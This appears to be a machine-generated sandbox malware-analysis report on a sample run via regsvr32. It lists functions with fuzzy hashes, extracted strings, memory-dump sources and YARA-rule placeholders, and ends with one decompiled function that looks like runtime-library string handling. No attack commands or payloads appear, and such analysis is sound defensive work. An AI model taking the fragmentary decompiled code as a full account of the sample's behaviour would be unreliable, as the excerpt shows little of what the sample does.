Opcode Fuzzy Hash: f44d21e5aaee4d09a7906727ccc28054b3bfd477728245e5ecf97a954938050c
Instruction Fuzzy Hash: 09416E71108B488FD368DF19D48925ABBF0FB8A741F508A6DE5CAC7261DB71D849CB82

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180025280 Relevance: 2.6, Strings: 2, Instructions: 128COMMON

Download Yara Rule

Strings

Md, xrefs: 0000000180025315
dI, xrefs: 00000001800252D5

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Md$dI
API String ID: 0-3822105114
Opcode ID: 6718a2595727e304f58786852357c464bafa5dbfe32c2cb15ee479bbe7753c2a
Instruction ID: 23b47bd1dbc9ffe159e368d3f6bad8723f55991696dbc6209d303bf4392bdb6f
Opcode Fuzzy Hash: 6718a2595727e304f58786852357c464bafa5dbfe32c2cb15ee479bbe7753c2a
Instruction Fuzzy Hash: C6414D7050DB848FD769DF28D08A76ABBF0FB99700F004A5DE98ACB256C770D905CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180025B0C Relevance: 2.6, Strings: 2, Instructions: 128COMMON

Download Yara Rule

Strings

d, xrefs: 0000000180025C10
5tv, xrefs: 0000000180025BC9

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5tv$d
API String ID: 0-1336818326
Opcode ID: 1b818d572de728eb3031ec2a2a2547713219a8efe97dbf2c879e41f5726fd6ef
Instruction ID: 475345fda201d03b2aa0922abd73baa5058808b6051412fcdb63cef9fa48a10c
Opcode Fuzzy Hash: 1b818d572de728eb3031ec2a2a2547713219a8efe97dbf2c879e41f5726fd6ef
Instruction Fuzzy Hash: EC41317090CB448FE778DF28D48565ABBE0FB98710F204A5EE99987265DB30A845CF87

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011A19 Relevance: 2.6, Strings: 2, Instructions: 126COMMON

Download Yara Rule

Strings

q, xrefs: 0000000180011AE1
2Y, xrefs: 0000000180011A8A

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 2Y$q
API String ID: 0-2334638818
Opcode ID: 74b46a50ed6e68f5435d821121d260a4c410ab1bc8e4c0dc2fa41b3f3e88ba8a
Instruction ID: c6283db541ec513beef892d752db4e568727c1c4c815371c690050367e22e2dd
Opcode Fuzzy Hash: 74b46a50ed6e68f5435d821121d260a4c410ab1bc8e4c0dc2fa41b3f3e88ba8a
Instruction Fuzzy Hash: 64514D70148788CBEBBACE28C8857DD37B0FB48355F904129E84D8A290DF399B4ACB41

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800016A0 Relevance: 2.6, Strings: 2, Instructions: 126COMMON

Download Yara Rule

Strings

5tv, xrefs: 0000000180001771
, xrefs: 000000018000174D

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 5tv$
API String ID: 0-2780997735
Opcode ID: cdb677b7efbf6727cc15d00abc8acfbddd9a3a6a0863419609f6b64b25884b1d
Instruction ID: 682efdfb835f0944d9b3cd1d19bf2dc5a795d751ab9dde4968e598024bbf9c71
Opcode Fuzzy Hash: cdb677b7efbf6727cc15d00abc8acfbddd9a3a6a0863419609f6b64b25884b1d
Instruction Fuzzy Hash: 6B41D67060CB848FD7A8DF29D48575ABBE1FB99700F104A6EE48EC7351DB309845CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800099A0 Relevance: 2.6, Strings: 2, Instructions: 123COMMON

Download Yara Rule

Strings

", xrefs: 0000000180009A25
_J, xrefs: 0000000180009AAA

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: _J$"
API String ID: 0-375824316
Opcode ID: 16754b455ce3a7da9d2704e1a58f0594b635269a4c9c34a8065f0cd238c443ce
Instruction ID: a015db09cc69215115070bbc18e5e19218d5f9ca582abc8bde2d6b3cb96b11d5
Opcode Fuzzy Hash: 16754b455ce3a7da9d2704e1a58f0594b635269a4c9c34a8065f0cd238c443ce
Instruction Fuzzy Hash: E451D7B090478E8BDF48CF68C8865DE7BB1FB48344F114A1DF866A7290D7B89665CF84

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800029CC Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

7>, xrefs: 00000001800029DD
+, xrefs: 00000001800029E5

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: +$7>
API String ID: 0-2758361454
Opcode ID: 2e8c382f1f5cae5d0cfd37c4f5f85487ae38f0e72fcc42c912503157f4b58bb7
Instruction ID: 4e37f663fc3c7aa3dcb7570ddacebebcd825af8254e41e5c90c44cc7432e9a11
Opcode Fuzzy Hash: 2e8c382f1f5cae5d0cfd37c4f5f85487ae38f0e72fcc42c912503157f4b58bb7
Instruction Fuzzy Hash: DE51907050478CCBEBBADF28CC9A7DB7BB1FB48348F500619D84A8E294DB765649CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010BAE Relevance: 2.6, Strings: 2, Instructions: 108COMMON

Download Yara Rule

Strings

fd];, xrefs: 00000001800156C9
m!yq, xrefs: 00000001800156B4

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: fd];$m!yq
API String ID: 0-2886939648
Opcode ID: ec9066c96f18cc99003324ad8cba80b3c9e29a914b4d0b9c646a8466c7d4c70b
Instruction ID: 45c9a4aadfef77d207881a56b7ae6fd3159e1bd1bfc115e0ecbadd116dbac687
Opcode Fuzzy Hash: ec9066c96f18cc99003324ad8cba80b3c9e29a914b4d0b9c646a8466c7d4c70b
Instruction Fuzzy Hash: B251963054878ACFDBB9CF14C885BEE77E1FB44344F10852DE46A8B691EB349A48DB42

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021894 Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

L9, xrefs: 00000001800219B0
m, xrefs: 00000001800218F5

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: L9$m
API String ID: 0-3029129943
Opcode ID: dcf02cfa2a7336adc6bb41e78a447814b2d4e6be1d3bb45263ee61ee01e9bb49
Instruction ID: c371cc2f659e7c88e38da41d4f73551d4e4d6346abd6407f59104d3dc464ceac
Opcode Fuzzy Hash: dcf02cfa2a7336adc6bb41e78a447814b2d4e6be1d3bb45263ee61ee01e9bb49
Instruction Fuzzy Hash: D551E4B090034E8FDB48CF68C88A4DE7FB0FB58358F20561DE856A6250D77896A5CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180013634 Relevance: 2.6, Strings: 2, Instructions: 98COMMON

Download Yara Rule

Strings

;g, xrefs: 00000001800136DC
qB, xrefs: 0000000180013728

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ;g$qB
API String ID: 0-663762695
Opcode ID: 5d3f0c764fecbb7d488ab6b1d0b4b04407c8fb2aec2096327f09f152605ccfc9
Instruction ID: 0660f12f8a09808dc78b25dad7bc1da49ad33209b448fc61c10a9a874142b489
Opcode Fuzzy Hash: 5d3f0c764fecbb7d488ab6b1d0b4b04407c8fb2aec2096327f09f152605ccfc9
Instruction Fuzzy Hash: 1C51AFB190074A8BDF48CF64C88A4DE7FF0FB68398F11461DE855A6290D3B896A5CFC5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180025668 Relevance: 2.6, Strings: 2, Instructions: 95COMMON

Download Yara Rule

Strings

3}, xrefs: 00000001800257A3
uS, xrefs: 000000018002578A

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 3}$uS
API String ID: 0-647507659
Opcode ID: 8d8564e839c91ad1a765e7e5f09dd5de43adffc1adeceefb0586eb802114e0de
Instruction ID: 74e33d180aa3f8b76a70b405a3227075f3f50add8b225f92a0698480338c6ef9
Opcode Fuzzy Hash: 8d8564e839c91ad1a765e7e5f09dd5de43adffc1adeceefb0586eb802114e0de
Instruction Fuzzy Hash: AB41B2B090074E8FDB48CF68C48A4DE7BB0FB18398F11461DF856A6290D7B896A5CFD5

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180011C90 Relevance: 2.6, Strings: 2, Instructions: 94COMMON

Download Yara Rule

Strings

^t, xrefs: 0000000180011D96
@, xrefs: 0000000180011CBB

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: @$^t
API String ID: 0-4131695842
Opcode ID: a58368368c97d3b566623ad094667ddb6c4b2befb01036770ef35246eb38b4ea
Instruction ID: 2db60de07e1335c054fc2d92f6fc6112d48f95fe40d224dddc54528cc3da17ec
Opcode Fuzzy Hash: a58368368c97d3b566623ad094667ddb6c4b2befb01036770ef35246eb38b4ea
Instruction Fuzzy Hash: C2410A705187808FD318DF68C58A51ABBF0FB8A344F504A5DFA858B3A1D7B5D885CB46

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001E8E4 Relevance: 2.6, Strings: 2, Instructions: 92COMMON

Download Yara Rule

Strings

', xrefs: 000000018001E9A3
"%, xrefs: 000000018001E9CB

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: "%$'
API String ID: 0-4021852118
Opcode ID: 174a401c34f44fa609ac95edce34ea569dd9484cc543c2c0dc597f184044b4b2
Instruction ID: d895a8db6a836dd65a14fa95b8adfd14ec7b7bf6b77f888c55fc06651afbb9ca
Opcode Fuzzy Hash: 174a401c34f44fa609ac95edce34ea569dd9484cc543c2c0dc597f184044b4b2
Instruction Fuzzy Hash: 3F311870118B448FE798DF28C489A1ABBE1FB88384F604A2DF596C7360D374D945CF42

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000B3A4 Relevance: 2.6, Strings: 2, Instructions: 88COMMON

Download Yara Rule

Strings

&X\, xrefs: 000000018000B48B
#X, xrefs: 000000018000B409

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #X$&X\
API String ID: 0-68823137
Opcode ID: e7642a3e4f8f819326dc7b60a532d803c32389be331e47485af71a90eac779b6
Instruction ID: d68ec68d6f63515a3e3bdabecc048ab4ba3cb28e523a66ac6d2b66fee9e09ed2
Opcode Fuzzy Hash: e7642a3e4f8f819326dc7b60a532d803c32389be331e47485af71a90eac779b6
Instruction Fuzzy Hash: 11315AB0108B059FE7A9CF28C085A1ABBE0FB98344F60591CF586C62B1DB35D845CF02

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001428C Relevance: 2.6, Strings: 2, Instructions: 80COMMON

Download Yara Rule

Strings

J", xrefs: 00000001800143B3
BF, xrefs: 000000018001439A

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: BF$J"
API String ID: 0-3135042434
Opcode ID: 5f922010ae825af1b28cd17ba37e35f6bd20f53a7b48d21b121c5292f972feba
Instruction ID: 4bd68fb9fd32dc983de20f5bcd24004bd9f52c0e63f984e93b7b08f149123488
Opcode Fuzzy Hash: 5f922010ae825af1b28cd17ba37e35f6bd20f53a7b48d21b121c5292f972feba
Instruction Fuzzy Hash: C141C7B190078E8FDB48CF64C88A5DE7BB0FF18358F50461DE866A6261D7B89664CFC4

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014C80 Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

2., xrefs: 0000000180014D23
|G, xrefs: 0000000180014CC8

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 2.$|G
API String ID: 0-156813315
Opcode ID: 61cbdd1641784e2b07d81c51757d3b964695c396bee5423fbc7609edeae1d8a5
Instruction ID: 655b8ac7a7cfca24aaef5ce2e38309ec63c0334a2f5ac8a916f73782318c4cc6
Opcode Fuzzy Hash: 61cbdd1641784e2b07d81c51757d3b964695c396bee5423fbc7609edeae1d8a5
Instruction Fuzzy Hash: 4E310770608B898FD7B8CF28C08639BB7E1FB99314F408A2DD08EC6295DB748845CB07

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007130 Relevance: 2.6, Strings: 2, Instructions: 73COMMON

Download Yara Rule

Strings

P, xrefs: 000000018000725F
iQ, xrefs: 00000001800071BB

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: P$iQ
API String ID: 0-3006515628
Opcode ID: 5139c9901125cf8f8cec41676cb266c44a84552ba89eefd726232ad769ef83bf
Instruction ID: e82642bc8128441b7dcc3334f0729daaa59dc5e1eda0cb024cd7336076dff94b
Opcode Fuzzy Hash: 5139c9901125cf8f8cec41676cb266c44a84552ba89eefd726232ad769ef83bf
Instruction Fuzzy Hash: D831B070958B858BE368DF29C08A51FBBE1BB94344F200A1DF5D5863A1DBB4954ACF83

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008D40 Relevance: 2.6, Strings: 2, Instructions: 68COMMON

Download Yara Rule

Strings

CB, xrefs: 0000000180008D89
$/, xrefs: 0000000180008D44

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: $/$CB
API String ID: 0-1282250384
Opcode ID: 81911d321b369e19af62be08bddb36ccefe9a8bf58cb624a2ba6607796043e99
Instruction ID: ce9d2fd9107c90121f6ee8c7778ca2acdaa783d179153bfa66d031bb3530ab1d
Opcode Fuzzy Hash: 81911d321b369e19af62be08bddb36ccefe9a8bf58cb624a2ba6607796043e99
Instruction Fuzzy Hash: EC319C7451C3858BD348DF28C44A52BBBE0FB8931CF500B2DF4CAA6251D378D606CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000C65C Relevance: 2.6, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

Z?, xrefs: 000000018000C668
b, xrefs: 000000018000C670

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: Z?$b
API String ID: 0-1768779257
Opcode ID: b219a3207434b0e178abd622b61cec7921586d0754f2a2622ef973b06c9928fb
Instruction ID: f85f6c254545b88424a3079b7e614ec61541263b31469fabddb5dd5585c9876d
Opcode Fuzzy Hash: b219a3207434b0e178abd622b61cec7921586d0754f2a2622ef973b06c9928fb
Instruction Fuzzy Hash: 1431A1B4528781AFC798DF28C59A81FBBE1FB88304F806A1DF9868A350D335D405CB02

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000BAD0 Relevance: 2.6, Strings: 2, Instructions: 65COMMON

Download Yara Rule

Strings

S=}, xrefs: 000000018000BB90
!', xrefs: 000000018000BB69

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: !'$S=}
API String ID: 0-1426155830
Opcode ID: ce0f6d1e07f533e21861334d9bc8bbf5ea9c1460895176455d4563657c08c79d
Instruction ID: c34bfdd6f23bcda513f3c87e7cfea085e374644de8ccaabb7c270113b5c00615
Opcode Fuzzy Hash: ce0f6d1e07f533e21861334d9bc8bbf5ea9c1460895176455d4563657c08c79d
Instruction Fuzzy Hash: C8317AB190078E8FDB58CF68D84A5DF7BA1FB18718F014A19FC6A96254D3B4C668CF80

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180007014 Relevance: 2.6, Strings: 2, Instructions: 63COMMON

Download Yara Rule

Strings

E, xrefs: 0000000180007118
YS, xrefs: 00000001800070D9

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: E$YS
API String ID: 0-735149948
Opcode ID: 43a208b0f51a86defcf8492d75f9b0295afcf01c0568758e1aff76522162fb07
Instruction ID: 4592ee0109c1b769a5b0755240e9ee3eac3dd8270b288fe68912ac1910cb6f30
Opcode Fuzzy Hash: 43a208b0f51a86defcf8492d75f9b0295afcf01c0568758e1aff76522162fb07
Instruction Fuzzy Hash: B9315B715187848BD348DF28C45A52ABAE1BB9C31CF454B2DF4CAAA790D37C9A05CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180019E08 Relevance: 2.6, Strings: 2, Instructions: 63COMMON

Download Yara Rule

Strings

zdJ, xrefs: 0000000180019E90
;B, xrefs: 0000000180019E9E

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ;B$zdJ
API String ID: 0-85318069
Opcode ID: 44403f6004564e55cc460da937d6cb251a3e9e5b06402202718ff149627838ea
Instruction ID: c801a74d2f7d87c2f7774eec352f8aca000c49ff69467b74f72421baa0d30ccb
Opcode Fuzzy Hash: 44403f6004564e55cc460da937d6cb251a3e9e5b06402202718ff149627838ea
Instruction Fuzzy Hash: 71317AB56087848BD348DF28C55651BBBE0BB9C30CF404B5DF5CAAB2A1D778E604CB4A

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000D6A4 Relevance: 2.6, Strings: 2, Instructions: 58COMMON

Download Yara Rule

Strings

G!, xrefs: 000000018000D6B9
M, xrefs: 000000018000D6A8

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: G!$M
API String ID: 0-4181500389
Opcode ID: d0aebad791f0ef5902cfa85e5254beca2a6b6ba56e5a9a8ce845976339f365cb
Instruction ID: 34657a944fd9670636fc81a615fc3e23ac55de0e76a6fe8c32ee2c4ae6ebfe38
Opcode Fuzzy Hash: d0aebad791f0ef5902cfa85e5254beca2a6b6ba56e5a9a8ce845976339f365cb
Instruction Fuzzy Hash: 9C3126B55087858FD388DF28D48A41BBBE4BB9D308F405B1DF4CAAB260D738D6458B0A

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800137DC Relevance: 2.6, Strings: 2, Instructions: 57COMMON

Download Yara Rule

Strings

T|, xrefs: 00000001800138BE
TG, xrefs: 00000001800137E8

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: TG$T|
API String ID: 0-3042096617
Opcode ID: 02422726d864e5295f32e44f7f6a443c31ea0d81d041bc712d4a284db1ff9d5e
Instruction ID: 5a343e11d9fb6a1e52555f0e3ad140c4b181f3131215b95d54a5ec3371dae465
Opcode Fuzzy Hash: 02422726d864e5295f32e44f7f6a443c31ea0d81d041bc712d4a284db1ff9d5e
Instruction Fuzzy Hash: 73216CB452C780AFD3D8DF28D48A90BBBE0BB99314F806A1DF8CA86290D774D445CB46

Uniqueness

Uniqueness Score: -1.00%

Function 000000018001C57C Relevance: 2.1, Strings: 1, Instructions: 880COMMON

Download Yara Rule

Strings

NkN, xrefs: 000000018001D3D2

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: NkN
API String ID: 0-239520485
Opcode ID: 5ead05261dbd5eb17ec6fe9b2cfd5b33674e2ea168060564fdc05eddb288b6b2
Instruction ID: 94e7b02698dbaff0378697066703af8d3c180d1fdef3478323a77fda78e5d403
Opcode Fuzzy Hash: 5ead05261dbd5eb17ec6fe9b2cfd5b33674e2ea168060564fdc05eddb288b6b2
Instruction Fuzzy Hash: 59B23CB550478D8FDBBADF28CC497DB3BA5FB59314F00422ADC0ACA2A0E7769655CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180005684 Relevance: 2.1, Strings: 1, Instructions: 847COMMON

Download Yara Rule

Strings

4mBG, xrefs: 000000018000633F

Memory Dump Source

Source File: 00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_180001000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: 4mBG
API String ID: 0-888475949
Opcode ID: 935e881693950b67a83cff4f45085fe3be30331c6423612ccdfe2a6f5273adc4
Instruction ID: 217f11d85181cf4ac19dd14d393826e4428b425c7c4e62f155c111bb576ecedc
Opcode Fuzzy Hash: 935e881693950b67a83cff4f45085fe3be30331c6423612ccdfe2a6f5273adc4
Instruction Fuzzy Hash: CB92037550170DCFDBA8CF28C48A6DA3BE4FB18308F614129FC5A962A1D778E919CF46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD2B0719D4 Relevance: 1.7, APIs: 1, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E00007FFD7FFD2B0719D4(void* __ecx, void* __eflags, intOrPtr* __rcx, intOrPtr* __rdx, void* __r8, intOrPtr* __r9, intOrPtr* _a40) {
				signed int _v88;
				char _v232;
				void* _v248;
				void* _v256;
				void* _v264;
				signed int _v280;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				signed long long _t75;
				signed long long _t76;
				intOrPtr* _t77;
				intOrPtr* _t80;
				intOrPtr* _t107;
				intOrPtr* _t109;
				intOrPtr* _t110;
				signed int _t120;
				intOrPtr* _t121;
				void* _t123;
				intOrPtr* _t125;

				_t118 = __r9;
				_t111 =  &_v248;
				_t75 =  *0x2b0c70a0; // 0xf787487f4682
				_t76 = _t75 ^  &_v248;
				_v88 = _t76;
				_t109 = _a40;
				_t80 = __r9;
				_t123 = __r8;
				_t110 = __rdx;
				_t107 = __rcx;
				E00007FFD7FFD2B067F5C(__ecx, __eflags, _t76, __rcx, _t109, __r8);
				_t3 = _t76 + 0x170; // 0x170
				_t4 = _t76 + 0x168; // 0x168
				r12d = 0;
				_v248 = _t3;
				_t6 = _t76 + 0x174; // 0x174
				_t7 = _t76 + 0x1f7; // 0x1f7
				_t122 = _t7;
				_v264 = _t4;
				_v256 = _t6;
				if (__rcx == 0) goto 0x2b071bea;
				if (__rdx == 0) goto 0x2b071bea;
				if (__r8 == 0) goto 0x2b071bea;
				if ( *((char*)(__rcx)) != 0x43) goto 0x2b071aaf;
				if ( *((intOrPtr*)(__rcx + 1)) != r12b) goto 0x2b071aaf;
				if (E00007FFD7FFD2B066870(_t76, __rdx, __r8, 0x2b0846b0) != 0) goto 0x2b071a9a;
				if (__r9 == 0) goto 0x2b071a8a;
				 *__r9 = r12d;
				 *((intOrPtr*)(__r9 + 4)) = r12w;
				if (_t109 == 0) goto 0x2b071a92;
				 *_t109 = r12d;
				_t77 = __rdx;
				goto 0x2b071bec;
				r9d = 0;
				r8d = 0;
				_v280 = _t120;
				E00007FFD7FFD2B06938C();
				asm("int3");
				E00007FFD7FFD2B0653B0(_t32, __rcx);
				_t121 = _t77;
				if (_t77 - 0x83 >= 0) goto 0x2b071aea;
				if (E00007FFD7FFD2B0657E0(0, _t7, __rcx) == 0) goto 0x2b071b79;
				if (E00007FFD7FFD2B0657E0(0, _v256, __rcx) == 0) goto 0x2b071b79;
				_t14 =  &_v232; // 0xb9
				r15d = 0;
				if (E00007FFD7FFD2B0715B0(0, _t80, _t14, __rcx, __rcx, _t109, 0x2b0846b0) != 0) goto 0x2b071bea;
				_t16 =  &_v232; // 0xb9
				_t17 =  &_v232; // 0xb9
				if (E00007FFD7FFD2B077FCC(0, E00007FFD7FFD2B0715B0(0, _t80, _t14, __rcx, __rcx, _t109, 0x2b0846b0), _t77, _t80, _t17, _v264, _t16, _t118) == 0) goto 0x2b071bea;
				_t78 = _v264;
				 *_v248 =  *(_v264 + 4) & 0x0000ffff;
				0x2b071760();
				if ( *_t107 == r15b) goto 0x2b071b53;
				if (_t121 - 0x83 >= 0) goto 0x2b071b53;
				_t125 = _t121;
				goto 0x2b071b5a;
				_t23 = _t125 + 1; // 0x1
				if (E00007FFD7FFD2B077670(_v264, _v256, _v264, 0x2b08398d, _t23) != 0) goto 0x2b071bd4;
				if (_t80 == 0) goto 0x2b071b8f;
				r8d = 6;
				E00007FFD7FFD2B064B80(0, _t80, _t80, _v264, 0x2b08398d);
				if (_t109 == 0) goto 0x2b071ba7;
				r8d = 4;
				E00007FFD7FFD2B064B80(0, _t109, _t109, _v248, 0x2b08398d);
				if (E00007FFD7FFD2B066870(_t78, _t110, _t123, _t122) != 0) goto 0x2b071bbe;
				goto 0x2b071bec;
				_v280 = _v280 & 0x00000000;
				r9d = 0;
				r8d = 0;
				E00007FFD7FFD2B06938C();
				asm("int3");
				_v280 = _v280 & 0x00000000;
				r9d = 0;
				r8d = 0;
				E00007FFD7FFD2B06938C();
				asm("int3");
				return E00007FFD7FFD2B064980(0, _v88 ^ _t111, _t123, _t122);
			}

0x7ffd2b0719d4
0x7ffd2b0719e1
0x7ffd2b0719e8
0x7ffd2b0719ef
0x7ffd2b0719f2
0x7ffd2b0719fa
0x7ffd2b071a02
0x7ffd2b071a05
0x7ffd2b071a08
0x7ffd2b071a0b
0x7ffd2b071a0e
0x7ffd2b071a13
0x7ffd2b071a1a
0x7ffd2b071a21
0x7ffd2b071a24
0x7ffd2b071a29
0x7ffd2b071a30
0x7ffd2b071a30
0x7ffd2b071a37
0x7ffd2b071a3c
0x7ffd2b071a44
0x7ffd2b071a4d
0x7ffd2b071a56
0x7ffd2b071a5f
0x7ffd2b071a65
0x7ffd2b071a7b
0x7ffd2b071a80
0x7ffd2b071a82
0x7ffd2b071a85
0x7ffd2b071a8d
0x7ffd2b071a8f
0x7ffd2b071a92
0x7ffd2b071a95
0x7ffd2b071a9a
0x7ffd2b071a9d
0x7ffd2b071aa4
0x7ffd2b071aa9
0x7ffd2b071aae
0x7ffd2b071ab2
0x7ffd2b071ab7
0x7ffd2b071ac0
0x7ffd2b071acf
